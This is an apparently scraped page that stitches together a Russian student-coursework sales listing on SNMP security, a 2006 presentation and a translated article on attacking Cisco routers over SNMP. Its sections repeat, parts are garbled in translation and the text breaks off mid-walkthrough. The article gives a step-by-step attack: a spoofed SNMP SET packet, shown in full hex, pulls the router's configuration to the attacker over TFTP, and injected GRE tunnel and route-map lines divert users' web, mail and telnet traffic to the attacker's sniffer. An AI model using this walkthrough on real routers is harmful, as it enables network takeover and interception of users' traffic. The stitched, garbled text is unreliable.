Snmp protocol methods of network attacks and defenses. snmp protocol. After executing the script, the SNMP packet will be intercepted. As expected, this request was rejected by the router and the configuration file was not sent
1,180 rub.
CONTENT
INTRODUCTION 3
1. THEORETICAL BASIS OF THE PROBLEM OF RESEARCHING METHODS OF ATTACKS ON THE SNMP PROTOCOL
1.1 THE NEED FOR STUDYING METHODS OF ATTACKS ON THE SNMP 5 PROTOCOL
1.2 SNMP PROTOCOL: DESCRIPTION, PURPOSE 7
2. ANALYSIS OF ATTACKS ON THE SNMP PROTOCOL AND COUNTERMEASURES
2.1 TECHNIQUES FOR ATTACKS ON THE SNMP PROTOCOL AND WAYS TO PREVENT THEM 11
2.2 WAYS TO COUNTER ATTACKS ON SNMP 15 PROTOCOL
CONCLUSION 20
LIST OF SOURCES USED 21
Fragment of work for review
Figure 3 - Screen form of the SoftPerfectNetworkScanner utility Patches Manufacturers of many network devices They develop so-called patches, the use of which is necessary when vulnerabilities are detected in the system. Therefore, if you find SNMP-enabled devices on your network, it is a good idea to contact the manufacturers of those devices to find out if they have developed the necessary patches. Disabling the SNMP Service Many experts tend to believe that if the SNMP service is not needed, it should be disabled or removed. Here is the algorithm for disabling the SNMP service in operating system Windows: Select the Start menu – Control Panel – Administrative Tools – Services (see Fig. 4). Selecting the SNMP service. If the service is running, click on the “Stop” button, and then select “Startup type” - “Disabled”. Figure 4 - Disabling the SNMP service It is worth noting that some of the potentially vulnerable products remain susceptible to DoS attacks or other actions that disrupt network stability even when SNMP is disabled. Ingress FilteringIngress filtering relies on configuring firewalls and routers to perform ingress filtering on UDP ports 161 and 162. This will prevent external network-initiated attacks on vulnerable devices in local network. Other ports that support SNMP-related services, including TCP and UDP ports 161, 162, 199, 391, 750, and 1993, may also require ingress filtering. Egress Filtering For effective protection, egress filtering can be implemented to control traffic emanating from the network. Filtering outgoing traffic on UDP ports 161 and 162 at the network edge can prevent your system from being used as a springboard for an attack. Intrusion Detection and Prevention Systems An Intrusion Detection System (IDS) is a software or hardware that detects events of unauthorized entry (intrusion or network attack) into a computer system or network. Without IDS, infrastructure becomes unthinkable network security. Complementing rule-based firewalls, IDS monitor and observe suspicious activity. They allow you to identify intruders who have penetrated the firewall and report this to the administrator, who will make the necessary decisions to maintain security. Intrusion detection methods do not guarantee complete system security. As a result of using IDS, the following goals are achieved: identifying a network attack or intrusion; making a forecast about likely future attacks and identifying system weaknesses to prevent their exploitation. In many cases, the attacker will perform a preparation phase, such as probing (scanning) the network or otherwise testing it to discover system vulnerabilities; documenting known threats; monitoring the quality of administration performed from a security perspective, particularly in large and complex networks; obtaining valuable information about intrusions that occurred in order to restore and correct the factors that led to the intrusion; identifying the location of the source of the attack from the point of view of the external network (external or internal attacks), which allows you to make the right decisions when placing network nodes. In general, the IDS contains: a subsystem surveillance, which collects information about events related to the security of the protected network or system; an analysis subsystem that detects suspicious activities and network attacks; a storage that stores primary events and analysis results; a management console for configuring IDS, monitoring the state of the protected system and IDS, studying situations detected by the analysis subsystem. To summarize, we note that the simplicity of the popular SNMP protocol results in increased vulnerability. Because SNMP is so widely used, operating networks with vulnerable products can have disastrous consequences. Therefore, to effectively use the SNMP protocol, you should use various ways prevent attacks and build a comprehensive protection system. CONCLUSION The study is devoted to the issues of ensuring the security of organizing network interaction using the SNMP protocol. In the process of work, the features of the named protocol and possible problems with its use were identified. To substantiate the problem, statistical data are provided confirming the high probability of network attacks. In addition, the theoretical part contains information about the structure of the protocol, the request/response scheme and the stages of obtaining responses to requests. Within course work An analysis of possible attacks on the SNMP protocol was carried out, among which are Dos attacks, Buffer Overflow attacks and those using format string vulnerabilities. Of course, there are many more potential threats, but their review requires a more in-depth and comprehensive study. To build a system for protecting the network interaction of network subscribers, methods for preventing attacks on the SNMP protocol were considered and it was noted that the use of a set of tools would be effective. Based on the analysis, it was revealed that the SNMP protocol is quite vulnerable and, if a decision is made to use it, a security policy should be developed and all its principles should be adhered to. Thus, we can conclude that the goal has been achieved and the tasks defined in the introduction have been solved. LIST OF SOURCES USED Regulatory and legal acts Federal law Russian Federation dated July 27, 2006 N 149-FZ On information, information technology and on information protection List of specialized and scientific literature Blank-Edelman D. Perl for system administration, M.: symbol-Plus, 2009.- 478 pp. Borodakiy V.Yu. Practice and prospects for creating a secure information and computing cloud based on MSS OGV / V.Yu. Borodakiy, A.Yu. Dobrodeev, P.A. Nashchekin // Current problems of development of technological systems of state security, special communication and special information support: VIII All-Russian Interdepartmental scientific conference: materials and reports (Orel, February 13–14, 2013). – At 10 o’clock. Part 4 / Generally ed. V.V. Mizerova. – Orel: Academy of the Federal Security Service of Russia, 2013. Grishina N.V. Organization integrated system information protection. - M.: Helios ARV, 2009. - 256 p., Douglas R. Mauro SNMP Basics, 2nd edition / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012. - 725 p. Kulgin M.V. Computer networks. Construction practice. For professionals, St. Petersburg: Peter, 2003.-462 pp. Mulyukha V.A. Methods and means of protection computer information. Firewall: Textbook / Mulyukha V.A., Novopashenny A.G., Podgursky Yu.E. - St. Petersburg: SPbSPU Publishing House, 2010. - 91 pp. Olifer V. G., Olifer N. P. Computer networks. Principles, technologies, protocols. - 4th. - St. Petersburg: Peter, 2010. -902 p. Switching and routing technologies in local computer networks: training manual/ Smirnova E. V. et al.; ed. A.V. Proletarsky. – M.: Publishing house of MSTU im. N.E. Bauman, 2013. – 389 pp. Flenov M. Linux through the eyes of a Hacker, St. Petersburg: BHV-St. Petersburg, 2005. – 544 pp. Khoreev P.V. Methods and means of protecting information in computer systems. - M.: publishing center "Academy", 2005. -205 p. Khoroshko V. A., Chekatkov A. A. Methods and means of information security, K.: Junior, 2003. - 504 p. Internet sourcesIDS/IPS - Systems intrusion detection and prevention [ Electronic resource] URL: http://netconfig.ru/server/ids-ips/.Analysis of Internet threats in 2014. DDoS attacks. Hacking websites. [Electronic resource]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdf Kolischak A. Format string vulnerability [Electronic resource]. URL: https://securityvulns.ru/articles/fsbug.aspFirst Mile, No. 04, 2013 [Electronic resource]. URL: http://www.lastmile.su/journal/article/3823 Family of SNMP standards [Electronic resource]. URL: https://ru.wikibooks.org/wiki /SNMP_standards_familyForeign literature"CERT Advisory CA-2002-03: Multiple Vulnerabilities in Many Implementations of the Simple Network Management Protocol (SNMP)", 12 Feb. 2002, (current March 11, 2002)
References
LIST OF SOURCES USED
Regulatory acts
1. Federal Law of the Russian Federation of July 27, 2006 N 149-FZ On information, information technologies and information protection
List of specialized and scientific literature
2. Blank-Edelman D. Perl for system administration, M.: symbol-Plus, 2009.- 478 p.
3. Borodakiy V.Yu. Practice and prospects for creating a secure information and computing cloud based on MSS OGV / V.Yu. Borodakiy, A.Yu. Dobrodeev, P.A. Nashchekin // Current problems in the development of technological systems of state security, special communications and special information support: VIII All-Russian interdepartmental scientific conference: materials and reports (Orel, February 13–14, 2013). – At 10 o’clock. Part 4 / Generally ed. V.V. Mizerova. – Orel: Academy of the Federal Security Service of Russia, 2013.
4. Grishina N.V. Organization of a comprehensive information security system. - M.: Helios ARV, 2009. - 256 p.
5. Douglas R. Mauro SNMP Basics, 2nd edition / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012.-725p.
6. Kulgin M.V. Computer networks. Construction practice. For professionals, St. Petersburg: Peter, 2003.-462 p.
7. Mulyukha V.A. Methods and means of protecting computer information. Firewall: Textbook / Mulyukha V.A., Novopashenny A.G., Podgursky Yu.E. - St. Petersburg: SPbSPU Publishing House, 2010. - 91 p.
8. Olifer V. G., Olifer N. P. Computer networks. Principles, technologies, protocols. - 4th. - St. Petersburg: Peter, 2010. -902 p.
9. Switching and routing technologies in local computer networks: textbook / SmirnovaE. V. et al.; ed. A.V. Proletarsky. – M.: Publishing house of MSTU im. N.E. Bauman, 2013. – 389 p.
10. Flenov M. Linux through the eyes of a Hacker, St. Petersburg: BHV-St. Petersburg, 2005. – 544 p.
11. Khoreyev P.V. Methods and means of protecting information in computer systems. – M.: publishing center "Academy", 2005. –205 p.
12. Khoroshko V. A., Chekatkov A. A. Methods and means of information protection, K.: Junior, 2003. - 504 p.
Internet sources
13. IDS/IPS - Intrusion detection and prevention systems [Electronic resource] URL: http://netconfig.ru/server/ids-ips/.
14. Analysis of Internet threats in 2014. DDoS attacks. Hacking websites. [Electronic resource]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdf
15. Kolischak A. Format string vulnerability [Electronic resource]. URL: https://securityvulns.ru/articles/fsbug.asp
16. First Mile, No. 04, 2013 [Electronic resource]. URL: http://www.lastmile.su/journal/article/3823
17. SNMP family of standards [Electronic resource]. URL: https://ru.wikibooks.org/wiki /SNMP_standards_family
Foreign literature
18. "CERT Advisory CA-2002-03: Multiple Vulnerabilities in Many Implementations of the Simple Network Management Protocol (SNMP)", 12 Feb. 2002, (current March 11, 2002)
Please carefully study the content and fragments of the work. Money for purchased finished works will not be returned due to the fact that the work does not meet your requirements or is unique.
* The category of work is of an evaluative nature in accordance with the qualitative and quantitative parameters of the material provided. This material, neither in its entirety nor any of its parts, is a finished scientific work, final qualification work, scientific report or other work provided for state system scientific certification or necessary for passing intermediate or final certification. This material is a subjective result of processing, structuring and formatting the information collected by its author and is intended, first of all, for use as a source for independent preparation of work on this topic.
CONCLUSION
The study is devoted to the issues of ensuring the security of network interaction using the SNMP protocol. In the process of work, the features of the named protocol and possible problems with its use were identified. To substantiate the problem, statistical data are provided confirming the high probability of network attacks. In addition, the theoretical part contains information about the structure of the protocol, the request/response scheme and the stages of obtaining responses to requests.
As part of the course work, an analysis of possible attacks on the SNMP protocol was carried out, among which are Dos attacks, Buffer Overflow attacks and those using format string vulnerabilities. Of course, there are many more potential threats, but their review requires a more in-depth and comprehensive study aniye.
To build a system for protecting the network interaction of network subscribers, methods for preventing attacks on the SNMP protocol were considered and it was noted that the use of a set of tools would be effective.
Based on the analysis, it was revealed that the SNMP protocol is quite vulnerable and, if you still decide to use it, you should develop a security policy and adhere to all its principles.
Thus, we can conclude that the goal has been achieved and the tasks defined in the introduction have been solved.
INTRODUCTION
The modern rapid development of information technology places new demands on the storage, processing and distribution of data. From traditional storage media and dedicated servers, companies and individuals are gradually moving to remote technologies implemented through global network Internet. Internet services can become indispensable tools for the functioning of a modern, dynamically developing company, which include: email; exchange of files, voice messages and data using video applications; development of your own Web resources.
According to many experts, the widespread use of Internet technologies requires the construction of a system for effective management of network devices, one of the tools of which can be become the SNMP protocol. However, organizing the management and monitoring of network devices through this protocol makes network elements vulnerable to attacks. Thus, issues of technology for preventing network attacks in the light of the development of Internet services come to the fore and require comprehensive analysis. That is why the research topic is relevant.
The questions of many authors have been devoted to the issues of building a system for protecting against attacks on the SNMP protocol, but there is no consensus on the advisability of using SNMP due to the complexity of ensuring security. Thus, Flenov M. in his book “Linux through the eyes of a Hacker” highlighted the disadvantages of this protocol and does not recommend its use. Smirnova E. V. In the textbook “Switching and routing technologies in local computer networks” he provides information on multicast data transmission schemes and effective management network equipment using the SNMP protocol, and also separately highlights the security issues of its use. A further review of specialized literature and Internet sources confirmed the need to study the issues of secure use of the SNMP protocol in order to decide on the advisability of its use. basis for this decision will be an analysis of possible attacks and the effectiveness of methods to prevent them.
The purpose of the study is to conduct a comprehensive analysis of possible attacks on the SNMP protocol and countermeasures.
To achieve the goal, it is necessary to solve a number of problems:
1. Conduct a review of literature and Internet sources on the organization of secure network interaction based on the use of the SNMP protocol.
2. Justify the need to study methods of attacks on the SNMP protocol and ways to prevent them.
3. Highlight the features of management based on the SNMP protocol.
4. Conduct an analysis of techniques for the SNMP protocol.
5. Describe methods for preventing attacks on the SNMP protocol.
The object of study is the SNMP protocol.
The subject of the research is methods of network attacks on the SNMP protocol and ways to prevent them.
Research methods: analysis, synthesis, study of information sources.
The course work consists of an introduction, two chapters and a conclusion. The first chapter is devoted to the theoretical basis of the problem. The second chapter contains an analysis of possible attacks and ways to prevent them
CONTENT
INTRODUCTION 3
1. THEORETICAL BASIS OF THE PROBLEM OF RESEARCHING METHODS OF ATTACKS ON THE SNMP PROTOCOL
1.1 THE NEED FOR STUDYING METHODS OF ATTACKS ON THE SNMP 5 PROTOCOL
1.2 SNMP PROTOCOL: DESCRIPTION, PURPOSE 7
2. ANALYSIS OF ATTACKS ON THE SNMP PROTOCOL AND COUNTERMEASURES
2.1 TECHNIQUES FOR ATTACKS ON THE SNMP PROTOCOL AND WAYS TO PREVENT THEM 11
2.2 WAYS TO COUNTER ATTACKS ON SNMP 15 PROTOCOL
CONCLUSION 20
LIST OF SOURCES USED 21
LIST OF SOURCES USED
Regulatory acts
1. Federal Law of the Russian Federation of July 27, 2006 N 149-FZ On information, information technologies and information protection
List of specialized and scientific literature
2. Blank-Edelman D. Perl for system administration, M.: symbol-Plus, 2009.- 478 p.
3. Borodakiy V.Yu. Practice and prospects for creating a secure information and computing cloud based on MSS OGV / V.Yu. Borodakiy, A.Yu. Dobrodeev, P.A. Nashchekin // Current problems of development of technological systems of state security, special communications and special information support: VIII All-Russian interdepartmental scientific conference: materials and reports (Orel, February 13-14, 2013). - At 10 o'clock. Part 4 / Generally ed. V.V. Mizerova. - Eagle: Akade Mission of the Federal Security Service of Russia, 2013.
4. Grishina N.V. Organization of a comprehensive information security system. - M.: Helios ARV, 2009. - 256 p.
5. Douglas R. Mauro SNMP Basics, 2nd edition / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012.-725p.
6. Kulgin M.V. Computer networks. Construction practice. For professionals, St. Petersburg: Peter, 2003.-462 p.
7. Mulyukha V.A. Methods and means of protecting computer information. Firewall: Textbook / Mulyukha V.A., Novopashenny A.G., Podgursky Yu.E. - St. Petersburg: SPbSPU Publishing House, 2010. - 91 p.
8. Olifer V. G., Olifer N. P. Computer networks. Principles, technologies, protocols. - 4th. - St. Petersburg: Peter, 2010. -902 p.
9. Switching and routing technologies in local computer networks: textbook / SmirnovaE. V. et al.; ed. A.V. Proletarsky. - M.: Publishing house of MSTU im. N.E. Bauman, 2013. - 389 p.
10. Flenov M. Linux through the eyes of a Hacker, St. Petersburg: BHV-St. Petersburg, 2005. - 544 p.
11. Khoreyev P.V. Methods and means of protecting information in computer systems. - M.: publishing center "Academy", 2005. -205 p.
12. Khoroshko V. A., Chekatkov A. A. Methods and means of information protection, K.: Junior, 2003. - 504 p.
Internet sources
13. IDS/IPS - Intrusion detection and prevention systems [Electronic resource] URL: http://netconfig.ru/server/ids-ips/.
14. Analysis of Internet threats in 2014. DDoS attacks. Hacking websites. [Electronic resource]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdf
15. Kolischak A. Format string vulnerability [Electronic resource]. URL: https://securityvulns.ru/articles/fsbug.asp
16. First Mile, No. 04, 2013 [Electronic resource]. URL: http://www.lastmile.su/journal/article/3823
17. SNMP family of standards [Electronic resource]. URL: https://ru.wikibooks.org/wiki /SNMP_standards_family
Foreign literature
18. "CERT Advisory CA-2002-03: Multiple Vulnerabilities in Many Implementations of the Simple Network Management Protocol (SNMP)", 12 Feb. 2002, (current March 11, 2002
Information Security - 2006
Report
SNMP is a convenient protocol
or threat to the corporate network
- BackgroundSNMP
SNMP (Simple Network Management Protocol) provides methods for managing network resources.
The history of the SNMP (Simple Network Management Protocol) protocol begins with its predecessor SGMP (Simple Gateway Monitoring Protocol), which was defined in RFC 1028 in 1987. SGMP was developed as a temporary solution to network management.
The SGMP standard defined the basic design model used in SNMP, describing the SGMP protocol only in terms of lookups and/or changes to variables stored on the router. This standard It also stands out for the small number of operations that are still the basis for SNMP operations today.
The first version of the SNMP framework, SNMPv1, was defined in RFC 1067 (later revised into RFCs 1098 and 1157) in 1993.
The new SNMPv2 specification was released in 1996 and included improvements such as a blocking mechanism, 64-bit counters, and improved error reporting.
The most recent addition to the protocol is SNMPv3, defined in 1999. Basically this is the same SNMPv2, but with improvements from a security point of view, such as: Security Model (protection model) and Access Control Model (access control model).
- Effective network control
SNMP can be used to manage any system connected to the Internet
The costs of implementing SNMP are minimal
Defining new " Managed Objects" (MIBs), management capabilities can be expanded easily
SNMP is quite robust; even in the event of work failures, the manager can continue to work (although it may take a little more effort)
Currently, data device manufacturers enable SNMP by default. This protocol has become the most important standard for network management.
- Is itSNMPis this a threat?
Depending on the version of the SNMP standard and the correct configuration of the equipment, this protocol can be used in many areas of hacking, from petty hooliganism to effective industrial espionage.
Often system administrators have a vague understanding of SNMP. Due to a vague understanding of the purpose of this protocol, and, accordingly, ignorance of the potential possible problems, its safety issues are often overlooked.
The fact that SNMP is based on UDP makes it even more interesting. As a connectionless protocol, UDP is vulnerable to IP spoofing attacks. If your organization has Cisco equipment, you're ready to explore what you can do with it using SNMP.
Attack scenario 1.
Below is the current configuration of the attacked router (Victim Router):
Current configuration: 1206 bytes
enable secret 5 $1$h2iz$DHYpcqURF0APD2aDuA. YX0
interface Ethernet0/0
interface Ethernet0/1
ip address 192.168.0
network 192.168.1.0
ip nat inside source list 102 interface Ethernet0/0 overload
no ip http server
access-list 1 permit 192.168.
access-list 102 permit ip any any
snmp-server community public RO
snmp-server community private RW 1
snmp-server enable traps tty
logging synchronous
Pay attention to the access rule for the RW group. This rule attempts to limit SNMP read/write access to only users on the local network (192.168.1.0).
There are two main stages of the attack:
Bypassing SNMP access rules on the attacked router in order to gain access to the router configuration file. Creating a GRE tunnel between the attacked router and the hacker’s router to remotely intercept the attacker’s traffic client machine(Victim Client).
Theory
Using the SNMP SET command, you can force the Cisco router to override/send its configuration file using TFTP.
By sending an SNMP SET request with a fake IP address (from the range described in RFC10) we must force the attacked router to send us its configuration file. This assumes that we know the 'private community string' and the ACL described in the RW group configuration string.
Bypassing SNMP Access Rules
Let's start by creating a fake SNMP request. Using a small Perl script and Ethereal, we will intercept standard SNMP SET request“copy config” which we will use as a base package.
root@whax# ./copy-router-config. pl
######################################################
# Copy Cisco Router config - Using SNMP
# Hacked up by muts - *****@***co. il
#######################################################
Usage: ./cisco-copy-config. pl
Make sure a TFTP server is set up, preferably running from /tmp!
After executing the script, the SNMP packet will be intercepted. As expected, this request was rejected by the router and the configuration file was not sent.
Pay attention to the attacker's IP address (80.179.76.227). Now, using a hex editor, we will change this IP address and some other packet header fields. IN hexadecimal system dead reckoning the spoofed IP address 192.168.1.5 looks like C0 A8
We will then send the packet using file2cable (or any other packet generator).
The packet bypasses SNMP access rules, and we receive the configuration file of the attacked router via TFTP.
GRE tunnel
GRE (Generic Routing Encapsulation) is a tunneling protocol designed to encapsulate arbitrary types of network layer packets within a network layer packet. One of the options for using GRE is to connect IPX network segments through a communication channel that supports only the network layer of the OSI model. In this case, you will need to create a GRE tunnel from one router to another to send IPX packets back and forth over an IP-only link.
However, we will use the GRE for purposes other than its normal purpose. Our plan is as follows:
- Create a GRE tunnel from the attacked router to the hacker's router. Determine what traffic will pass through the tunnel. Unpack GRE packets coming from the attacked router and forward them to the attacker’s computer (sniffer) for analysis.
Attacked router
We need to create a GRE tunnel on the attacked router. Since we don't have access to a terminal (console), we can simply edit the resulting configuration file and then send it back to the router using a fake SNMP SET request. Let's add following lines to the configuration file of the attacked router:
interface tunnel0
ip address 192.168.10
tunnel source Ethernet0/0
tunnel destination
tunnel mode gray ip
They mean the following:
- We created an interface tunnel0 and specified an IP address from the network 192.168.10.x. To exchange data, both ends of the tunnel must be on the same subnet. We specified that the Ethernet0/0 interface is the beginning of the tunnel (otherwise, where could the tunnel begin?) The end of the tunnel is the IP address of the external interface of the hacker's router. The last command is not required, since by default it is the GRE tunnel that is created anyway (but we still added it to be more sure).
Now we can configure access rules (access-lists) to specify the type of traffic passing through the tunnel and routing maps (route-maps) necessary to redirect traffic.
To do this, add a few more lines to the configuration file of the attacked router:
access-list 101 permit tcp any any eq 443
access-list 101 permit tcp any any eq 80
access-list 101 permit tcp any any eq 21
access-list 101 permit tcp any any eq 20
access-list 101 permit tcp any any eq 23
access-list 101 permit tcp any any eq 25
access-list 101 permit tcp any any eq 110
We have allowed data transfer via SSL, HTTP, FTP, telnet, SMTP and POP3 protocols.
Now, if the traffic matches the rules described above, it will be redirected in accordance with the routing maps, the description of which must be added to the configuration file:
router-map divert-traffic
match ip address 101
set ip next-hop 192.168.10.2
interface Ethernet0/0
ip policy route-map divert-traffic
- We created an access rule that allows all types of traffic. We have created a divert-to-sniffer routing map (this routing map will redirect tunneled traffic to the sniffer). The created access rule is used as a match condition. We specified the IP address of the attacker (sniffer) as the next-hop address. We have applied the routing map to the tunnel0 interface.
It is very important that we use a routing map to forward data. The router receives tunneled data encapsulated in a GRE packet, and without decoding the packet we cannot view it. By forwarding received packets to the attacker (sniffer), the router transmits them as regular IP packets without GRE encapsulation.
Finally, let's create a routing map and associate it with the Ethernet0/0 interface:
Attacker(config-if)# route-map divert-out
Attacker(config-route-map)# match ip address 101
Attacker(config-route-map)# set ip next-hop 192.168.10.1
Attacker(config-route-map)# exit
Attacker(config)# interface ethernet0/0
Attacker(config-if)# ip policy route-map divert-out
These additional settings mean the following:
- After the attacker (sniffer) intercepts and forwards the tunneled data back, the divert-out routing map will redirect the traffic back to the attacked router. We applied the routing map to the Ethernet interface.
Let's start the attack
After all the settings are completed, all we have to do is upload a new modified configuration file to the attacked router. The result will be the activation of the GRE tunnel and the redirection of all traffic from the local network of the attacked computer to the hacker (sniffer).
You can check the functionality of the tunnel by sending a debugging command to the attacker’s router:
Attacker# debug tunnel
-> 212.199.145.242, tos=0x0
*Mar 3 06:38: Tunnel0: GRE/IP to classify 212.199.145.242
->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0)
*Mar 3 06:38: Tunnel0: adjacency fixup, 80.179.20.55
-> 212.199.145.242, tos=0x0g all
As a result of these actions, Ethereal on the attacker’s computer will receive the following packets:
https://pandia.ru/text/78/194/images/image006_20.jpg" width="624" height="468">
A few hours later, we receive scan data:
The received data contains the following type of information:
- SysName - you can find out the address, phone number of the subscriber
- Agent IP Address -
- DNS -
- Response Time -
-Vendor-
- SystemDescription - can be used as additional useful information during attacks
- Community-snmp-community with which we extracted information
- Location - you can find out the address, phone number of the subscriber
- Contact - you can find out the name and nickname of the administrator
- Last Boot Time -
- Interfaces - the more, the more interesting
- Discovery Status -
From the received data we use IP addresses and the Real-time Network Monitor program in order to find out which useful information can be obtained through additional SNMP requests.
It is also quite possible to get full access to the device simply by replacing the snmp-community name from public to private. This gives us the opportunity to send various snmp commands.
Result of the attack:
After this experiment we learned that:
Not even used simplest method protection – access-lists
You can easily find out the number of clients of the provider
Confidential information of the provider's clients
Economic potential of the provider
Useful information that can be used in various attacks
- you can easily collect statistics of the provider and its corporate clients, with its further use for certain purposes
- Is it possible to prevent the attack? Protection methods
Sometimes some things are not what they seem. When dealing with SNMP (or other UDP-based protocols), you always need to be aware of the nooks and crannies that, if overlooked, could cause your network to be compromised.
Protection methods are extremely simple. They are completely dependent on network administrators:
Do not leave hardware settings at default (by default)
Correctly think through the scheme of using the protocol
Define complex names snmp-community
Use access lists
Specify single IP addresses in access lists, not IP ranges
- Conclusion
The goal of the work was to show not so much the effectiveness of the described attack, but the potential gaps in UDP-based protocols. This in no way means that Cisco/ZyXel equipment is unsafe. Proper configuration should minimize the chances of bypassing protection. Errors of network administrators are the main reasons for compromise of network equipment.
SNMP is an application-level protocol designed for the TCP/IP stack, although there are implementations for other stacks, such as IPX/SPX. The SNMP protocol is used to obtain information from network devices about their status, performance and other characteristics, which are stored in the Management Information Base (MIB). The simplicity of SNMP is largely due to the simplicity of the SNMP MIBs, especially their first versions, MIB I and MIB II. In addition, the SNMP protocol itself is also very simple.
An agent in the SNMP protocol is a processing element that provides managers located at network management stations with access to the values of MIB variables and thereby enables them to implement functions for managing and monitoring the device.
The main management operations are carried out in the manager, and the SNMP agent most often plays a passive role, transferring the values of accumulated statistical variables to the manager upon its request. In this case, the device operates with minimal overhead for maintaining the control protocol. It uses almost all of its processing power to perform its basic functions as a router, bridge, or hub, and the agent collects statistics and device state variable values and reports them to the management system manager.
SNMP - this is a protocol like "request-response", that is, for every request received from the manager, the agent must send a response. A special feature of the protocol is its extreme simplicity - it includes only a few commands.
The Get-request command is used by the manager to obtain from the agent the value of an object by its name.
The GetNext-request command is used by the manager to retrieve the value of the next object (without specifying its name) by sequentially scanning the object table.
Using the Get-response command, the SNMP agent sends the manager a response to the Get-request or GetNext-request commands.
The Set command is used by the manager to change the value of an object. The Set command is used to actually control the device. The agent must understand the meaning of the values of the object that is used to manage the device, and based on these values, perform the actual control action - disable the port, assign the port to a specific VLAN, etc. The Set command is also suitable for setting the condition under which the SNMP agent should send corresponding message to the manager. The response to events such as agent initialization, agent restart, connection loss, connection restoration, incorrect authentication, and loss of the nearest router can be defined. If any of these events occur, the agent issues an interrupt.
The Trap command is used by the agent to notify the manager that an exception has occurred.
SNMP v.2 adds the GetBulk command to this set, which allows the manager to obtain multiple variable values in one request.
Attack on Cisco via SNMP
Alexander Antipov
Matiai Aroni and William M. Hidalgo, translation by Vladimir Kuksenok
Introduction
Often system administrators have a vague understanding of SNMP. Due to a vague understanding of the purpose of this protocol, and therefore ignorance of potential problems, its security issues are often overlooked.You might be surprised the first time you see the output of a utility like Philip Waeytens' SNMP-Enum running on Windows 2000 Server with SNMP service enabled. The information collected could be very puzzling system administrator and provide insight into the rich capabilities of SNMP.
The fact that SNMP is based on UDP makes it even more interesting. As a connectionless protocol, UDP is vulnerable to IP spoofing attacks. If your organization has Cisco routers, you're ready to explore what you can do with them using SNMP.
Attack Scenario
Take a look at the example attack scenario shown in Figure 1.Figure 1. Example attack scenario.
Review the attack scenario. Below is the current configuration of the attacked router (Victim Router):
Current configuration: 1206 bytes! version 12.3! hostname Victim! enable secret 5 $1$h2iz$DHYpcqURF0APD2aDuA.YX0 ! interface Ethernet0/0 ip address dhcp ip nat outside half-duplex ! interface Ethernet0/1 ip address 192.168.1.1 255.255.255.0 ip nat inside half-duplex ! router rip network 192.168.1.0 ! ip nat inside source list 102 interface Ethernet0/0 overload no ip http server ip classless ! access-list 1 permit 192.168.1.0 0.0.0.255 access-list 102 permit ip any any ! snmp-server community public RO snmp-server community private RW 1 snmp-server enable traps tty ! line con 0 logging synchronous login line aux 0 line vty 0 4 password secret login ! ! end
Pay attention to the access rule for the RW group. This rule attempts to limit SNMP read/write access to only users on the local network (192.168.1.0).
There are two main stages of the attack:
- Bypassing SNMP access rules on the attacked router in order to gain access to the router configuration file.
- Creating a GRE tunnel between the attacked router and the hacker’s router to remotely intercept traffic from the attacked client machine (Victim Client).
Theory
As mentioned in the article “Exploiting Cisco Routers, Part 1”, using the SNMP SET command, you can force a Cisco router to override/send its configuration file using TFTP.By sending an SNMP SET request with a fake IP address (from the range described in RFC1918 - 192.168.1.0) we must force the attacked router to send us its configuration file. This assumes that we know the 'private community string' and the ACL described in the RW group configuration string.
Bypassing SNMP Access Rules
Let's start by creating a fake SNMP request. Using a small Perl script and Ethereal, we will intercept a standard SNMP SET “copy config” request, which we will use as a base package. root@whax# ./copy-router-config.pl ##################################### ################# # Copy Cisco Router config - Using SNMP # Hacked up by muts - [email protected]################################################## ##### Usage: ./cisco-copy-config.pl Make sure a TFTP server is set up, preferably running from /tmp ! root@whax# After executing the script, an SNMP packet similar to the one shown in Figure 2 will be captured. As expected, this request was rejected by the router and the configuration file was not sent.Figure 2. Intercepted SNMP packet.
Pay attention to the attacker's IP address (80.179.76.227). Now, using a hex editor, we will change this IP address and some other packet header fields. In hexadecimal notation, the spoofed IP address 192.168.1.5 looks like C0 A8 01 05, as shown in Figure 3.
Figure 3. Changing the return IP address of a packet.
Then we will send the packet using file2cable (or any other packet generator):
Root@whax:~# file2cable -v -i eth0 -f /root/snmp-mod file2cable - by FX Thanx go to Lamont Granquist & fyodor for their hexdump() /root/snmp-mod - 238 bytes raw data 000f 347c 501f 0006 1bcc 00fa 0800 4500 ..4|P.........E. 00e0 0000 4000 4011 35bd c0a8 0105 d4c7 ....@ [email protected]....... 91f2 8000 00a1 00cc 052e 3081 c102 0100 .........0..... 0407 7072 6976 6174 65a3 81b2 0203 00d6 ..private....... 9b02 0100 0201 0030 81a4 3016 0611 2b06 .......0..0...+. 0104 0109 0960 0101 0101 0283 f1b0 7802 .....`.......x. 0101 3016 0611 2b06 0104 0109 0960 0101 ..0...+......`.. 0101 0383 f1b0 7802 0104 3016 0611 2b06 ......x...0...+. 0104 0109 0960 0101 0101 0483 f1b0 7802 .....`.......x. 0101 3019 0611 2b06 0104 0109 0960 0101 ..0...+......`.. 0101 0583 f1b0 7840 0450 b34c e330 2706 [email protected]"." 0611 2b06 0104 0109 config0...+..... 0960 0101 0101 0e83 f1b0 7802 0104 .`........x... Packet length: 238 root@whax:~# After this, our TFTP server will accept the connection, Ethereal -log of which is shown in Figure 4.
Figure 4. Connection to a TFTP server intercepted by Ethereal.
Note the return IP address of the SNMP packet and the TFTP write request (packets 1 and 2). The packet bypasses SNMP access rules, and we receive the configuration file of the attacked router via TFTP.
GRE tunnel
GRE (Generic Routing Encapsulation) is a tunneling protocol designed to encapsulate arbitrary types of network layer packets within a network layer packet. One of the options for using GRE is to connect IPX network segments through a communication channel that supports only the network layer of the OSI model. In this case, you will need to create a GRE tunnel from one router to another to send IPX packets back and forth over an IP-only link.
However, we will use the GRE for purposes other than its normal purpose. Our plan is as follows:
- Create a GRE tunnel from the attacked router to the hacker's router.
- Determine what traffic will pass through the tunnel.
- Unpack GRE packets coming from the attacked router and forward them to the attacker’s computer (sniffer) for analysis.
Attacked router
